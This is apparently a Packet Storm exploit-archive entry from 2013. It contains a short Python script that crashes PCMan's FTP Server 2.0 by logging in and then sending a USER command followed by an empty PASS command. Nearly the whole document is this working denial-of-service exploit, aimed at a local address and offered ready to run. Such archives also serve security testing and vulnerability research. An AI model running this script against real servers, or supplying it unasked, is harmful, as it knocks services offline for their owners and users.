PCMan's FTP Server 2.0 Denial Of Service

2013-06-27T00:00:00
ID PACKETSTORM:122179
Type packetstorm
Reporter Chako
Modified 2013-06-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#  
#  
####################################################################  
#  
# Exploit Title: PCMan's FTP Server 2.0 Empty Password Denial of Service  
# Date: 2013/6/26  
# Exploit Author: Chako  
# Vendor Homepage: http://pcman.openfoundry.org/  
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG  
# Version: 2.0  
# Tested on: Windows 7 SP1 English  
#  
#Description:  
# A vulnerability has been identified in PCMan's FTP Server 2.0,   
# which allows attackers cause a Denial of Service using a   
# specially crafted request(empty Password).  
#  
####################################################################  
  
  
  
import socket  
import sys  
  
USER="chako"  
PASSWD="chako"  
  
print("\n\n[+] PCMan's FTP Server 2.0 Empty Password Denial of Service")  
print("[+] Version: V2.0")  
print("[+] Chako\n\n\n")  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect(("127.0.0.1",21))  
data = s.recv(1024)  
  
  
print("[-] Login to FTP Server...\n")  
s.send("USER " + USER + '\r\n')  
data = s.recv(1024)  
s.send("PASS " + PASSWD + '\r\n')  
data = s.recv(1024)  
  
  
  
print("[-] Sending exploit...\n")  
s.send("USER TEST\r\n'")  
s.send("PASS \r\n'")  
s.close()  
  
print("[!] Done! Exploit successfully sent\n")  
`